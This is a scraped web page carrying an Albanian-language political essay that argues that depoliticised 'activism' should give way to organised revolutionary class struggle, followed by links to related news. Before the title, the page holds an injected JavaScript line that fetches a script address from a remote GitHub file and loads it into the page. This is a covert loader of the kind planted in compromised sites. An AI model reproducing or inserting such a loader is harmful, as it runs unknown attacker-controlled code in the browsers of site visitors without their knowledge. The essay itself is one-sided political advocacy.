;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); POSHTË AKTIVIZMI , TË RROJË REVOLUCIONI - Антропол

POSHTË AKTIVIZMI , TË RROJË REVOLUCIONI

Date:

Këtu në shtetet e bashkuara  dhe në Veriun global në përgjithësi ka një mungesë qartësie përsa i përket domethënies së aktivizmit dhe aktivitetit revolucionar, në fakt shpesh këto terme ngatërohen me njera tjetrën. Kjo është bërë pjesë e gjendjes sonë post moderne ku cdo veprim, pa marrë parasysh sesa i vogël është ka vetitë esenciale e të qenurit një akt revolucionar vetvetiu duke mohuar narativa dominante kulturore  ose me tërheqjen nga pjesëmarrja në politik si shembull. Zgjedhjet jetësore si veganizmi, konsumerizmi etik, blerja fair, apo mohimi i thjeshtë i politikes në përgjithësi, janë bërë zëvendësues të linjës politike në shumë rrethe të së Majtës. Prandaj, një mohim  kthehet në një pohim pozitiv ku akti i thjeshtë i refuzimit ose i mospjesëmarrjes, ose tërheqjes trajtohet si një akt revolucionar i pavarur.

Vec kësaj, ajo që ka rëndësi më teper është anëtarësimi në një mikro komunitet, besimi personal dhe vlerat si dhe pamja e jashtme dhe veprimet indivuale të një personi. Nuk ka theks të vecantë  mbi ndryshimin politik dhe individual në një kolektivitet më të gjerë që lufton për emancipim të përgjithshëm. Pa anashkaluar rëndësinë e komuniteteve më të vogla që shpesh sigurojnë asistencë personale, pavarësi, dhe përkrahje për rrjete të komuniteteve të margjinalizuara, por më tepër këto mikrokomunitete ose stile jetësore janë të izoluara dhe nuk janë aspak të lidhura me luftën e plotë për emancipim dhe nuk mund të shquhen si revolucionare por si separatiste. Dhe jo vetëm kaq por si fenomene të depolitizuara dhe të izoluara ata asnjëherë nuk mund të bëhen revolucionare por mund të mbesin vetëm pasqyrime të individualizmit borgjez  të lidhur tërësisht me prirje konformiste drejtë një shoqerie borgjeze , një apatie të përgjithëshme apo cinizmi kundër luftës së masave dhe luftës politike.

Patjetër se ky veprim i tërheqjes, apo ndarjes nga jeta politike dhe betejës klasore pasqyron transformimin e demokracisë borgjeze në Veriun global nga modeli tradicional social demokratik në të ashtuquajturin participimi përfshirës drejt demokracisë neoliberale.

Me përhapjen e mikr-betejave dhe me zvogëlimin e kanaleve participuese për shprehje demokratike ashtu sic është SHBA në kuptimin e plotë të fjalës si  dhe fizikisht e rënuar , termi aktivizëm  ka ndryshuar plotësisht. Më herët të qenurit aktivist ishte dikush që ishte i transformuar politikisht, ose pas një luftë të gjatë apo përgjate një eventi të rëndësishëm (si të rinjtë vietnamez që u radikalizuan pas vrasjeve masive në vietnam) dhe pastaj zhytja e tyre në lëvizjet masive si dhe participimi në luften klasore për qëllime të caktuara politike. Tani aktivizmi është bërë një  refuzim i ndryshimit politik sepse është vetë refuzim i politizimit të gjërave , është bërë vetë anti politika.

Cdokush që ka parë një demonstratë, protestë, ose një tubim në shekujt e fundit ka gjasa të mëdha të ketë parë këto në vijim : njërëz që qëndrojnë përreth duke mbajtur shenja me slogane të ndryshme pa përmbajtje politike, kengë të kenduara pa interes përdrejt qiellit dhe disa grusht të ngritur përderisa njërëzit marshojne apo edhe më keq pjesëmarrës që qëndrojnë të heshtur përderisa një gjysëm akademik flet për problemin e ditës. Patjetër se pas gjithë kësaj që u tha e u bë tani ne mund të lajme duart nga faji sepse kemi bërë dicka, kemi vepruar (pas të gjithave të bësh dicka është më mirë sesa mos të bësh asgje) dhe kjo na bën më të mirë sesa ata që nuk kanë bërë asgje dhe jane injorant ndaj kauzës sonë. Por ktu qendron problemi, aktivistet janë aq të kënaqur duke bërë dicka sa qe kanë harruar të ndalën dhe të pyesën pse-të? Dhe cka-të? E asaj gjëje. Të pyesësh këto pyetje që janë pyetur nga aktivistët  para nesh , na dërgojnë drejt universalizimiz të luftës ,larg nga separatizmi dhe drejtë transformimit politik. Dërgon drejtë luftës klasore. Dhe përse arrinë atje? Sepse konceptualizimi kolektiv i domosdoshmërive të luftës tënde ndeshet me lidhjet e luftës tënde me luftat e tjera. Njohja e saj  është mallkim për separatizmin, apatinë, cinizmin, dhe politika identike, dërgon deri te teorizimi i një lidhje që dallon  mikro betejat  deri te njohja e rolit të tyre tek lufta e masave që në botën tonë kapitaliste është lufte klasore.

Perkunder aktivizmit, aktiviteti revolucionar kërkon politizim, kërkon revolucionarizimin e një individi.Për shumicen e studentëve, të rrënjosur me ideologjinë e borgjezisë së imët, nocioni i domosdoshmërise për të transformuar dhe për të përfshirë betejën personale ose betejën e komunitetit në një betejë me përmasa më të mëdha shfaq një totalizim shtypës dhe margjinalizim.Sidoqoftë , duke shpërfillur refuzimin e të gjitha totaliteteve si totalizime në vetëvete,nocioni se beteja e dikujt duhet të marë rol sekondar ose subordinar përsëri nuk duhet të jetë poenta, siç nuk duhet të jetë edhe privilegjimi i betejës së dikujt mbi atë të dikujt tjetër. Një betejë revolucionare përkunder një beteje të Aktivizmit, është totalizuese në kuptimin që është shuma e përgjithëshme e betejave për liri të njerëzve të shtypur e lidhur dhe e perparuar me anë të eksperiencës direkte.Kjo nuk është negative, siç do të na bënte të besonim tmerri post-modern i totalizimit, përkundrazi është pozitive.Dhe është pozitive sepse lëvizje masive revolucionare dhe jo aktiviste, kanë pasuar në çlirimin e mijëra e miljona njerëzve historikisht ( Reovlucioni në Rusi dhe në Kinë çliroi mbi 600 miljon njerëz në të dy vendet nga zgjedha kapitaliste,semi-feudale dhe nga imperializmi).Nga ana tjetër çfarë ka prodhuar linja e aktivizmit ? Mikro-beteja që çojnë në reforma graduale të cilat do ta përmirësojne gjendjen për shumën e një grupi të shtypur të veçantë që në ndërkohe grupet tjera të shtypura injorohen, sigurisht derisa mikro-beteja e tyre të shfaqet për të lehtësuar shtypjen e tyre( sepse do të ishte një “totalizim” ose “shtypje” sepse njëri nuk është në mënyrë të drejtëpërdrejtë anëtar i grupës tjetër të shtypur)

Në organizatën ku jam unë , sidhe ne shumë organizata të tjera ekziston një kontradiktë mes linjës së aktivizmit dhe linjës revolucionare.Ose thënë ndryshe mes linjës që shpreh dëshirë për grupim të shthurur dhe të depolitizuar që nuk dëshiron të bëjë asgjë më shumë se të protestoj për këtë ose atë, dhe linja e atyre që dëshirojnë të politizojnë vetëveten dhe masat , dhe të marshojnë drejtë organizimit dhe ndërtimit për një çlirim kolektiv.Kjo linjë e aktivizmit duhet të luftohet, dhe ata që e përkrahin patjetër të tejkalojnë në linjën revolucionare dhe të binden për domosdoshmërine e aplikimit të saj.Përderisa aktivizmi quan vetëveten trendi më revolucionar, dhe përsëri hedh poshtë politizimin dhe betejat masive në favor të mikro-betejave,në favor të ndërtimit personal parë nga brenda dhe në favor të hapësirave të depolitizuara rrjedh se në të vërtetë është kundërrevolucionare.Jo vetëm sepse është në kundërshtim me linjën revolucionare të shfaqur këtu, por sepse nuk mund të shpie në drejtim të çlirimit nga shtypja të cilës do ti japë fund me metodat të cilat i përdorin.Përderisa e Majta aktiviste ne europën perendimore dhe Amerikën Veriore vazhdojnë të kërkojnë me dylbi për zgjidhje jo-politike për probleme politike, shokët revolucionarë në Indi,Turqi ,Afganistan dhe Filipine kërkojnë të ty mësyjnë parajsës,të marin në dorë pushtetin shtetërorë dhe të çlirojnë miljona nga zinxhirët e kapitalizmit , imperializmit, shtypjes patriarkale, dhe kushteve semi-feudale. Por ata janë Revolucionarë dhe jo Aktivist.

Ne duhet të ballafaqohemi me faktin se kjo qasje nuk ka prodhuar asgjë më shumë se disa fitore të izoluara që skanë bërë asgjë më shumë se vetem përmirësojë minimalisht gjendjen ekzistuese.Ne kemi hedhur poshtë politikën në favor të të qenit cinik ose zemërngrirë/apatik, ne kemi hequr dorë nga partitë dhe organizimi në favor të ndarjes dhe një decentralizimi “hyjnorë”, ne pa bërë zë kemi privilegjuar betejat tona mbi ato të të tjerëve, dhe gjith këto i kemi bërë përderisa Shteti dhe Kapitalizmi kanë vazhduar sulmet ndaj nesh.Ne vullnetarisht kemi shpërbërë pushtetin tonë,mbrojtjen tonë, përpara ofensivës neoliberale dhe këtë e kemi quajtur çlirim.Ne kemi qenë gabim,aktivizmi është i gabuar, dhe është vërtetuar të jetë një rrugë qorre.

Mund të mos jetë e lehtë për shumë nga aktivistët e sodit ta pranojnë këtë , por vetëkritika është domosdoshmëri politike sidhe transformimi politik i individit në shërbim të masave.Është koha të dalim nga kështjellat prej fildishi, të dalim nga “zonat e sigurisë” që i kemi mbyllur hermetikisht, të dalim nga ekzili politik dhe ideologjik që ja kemi imponuar vetes dhe të hedhim hapin në betejën e klasave dhe ti shërbejmë popullit.Është koha që të integrojmë vetëveten me masat dhe të lëmë anash illuzionet petitborgjeze(borgjezisë së imët) të seperatizmit,apatisë dhe cinizmit dhe të themi se nuk do të pajtohemi me asgjë më pak se emancipim total dhe shkatërim të shoqërisë së vjetër me anë të pushtetit tonë kolektiv.Dhe më e rëndësishmja është koha të bëhemi Revolucionarë në shërbim të popujve të shtypur, të bëhemi më shumë se thjesht thirës parollash dhe mbajtës pllakatash që paraqet aktivistin, ta transformojmë vetëveten politikisht që të luftojmë për çlirim. Me këtë unë them

POSHTË AKTIVIZMI , TË RROJË REVOLUCIONI

 

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

Трамп сака ЕУ да испрати војници во Украина

Се шпекулира дека предлогот за прекин на огнот би...

Тестиран кинески хиперсоничен авион што лета со брзина 6,5 пати поголема од брзината на звукот

Главниот истражувач на проектот изјавил дека станува збор за...

Нигер го забрани Би-Би-Си поради „ширење дезинформации“

Регулаторот за медиуми на африканската држава нареди суспензија на...

Левица: Во кујната во „Кромберг и Шуберт“ продолжува кршењето на работничките права

Пред одреден период, Левица објави за непочитување и кршење...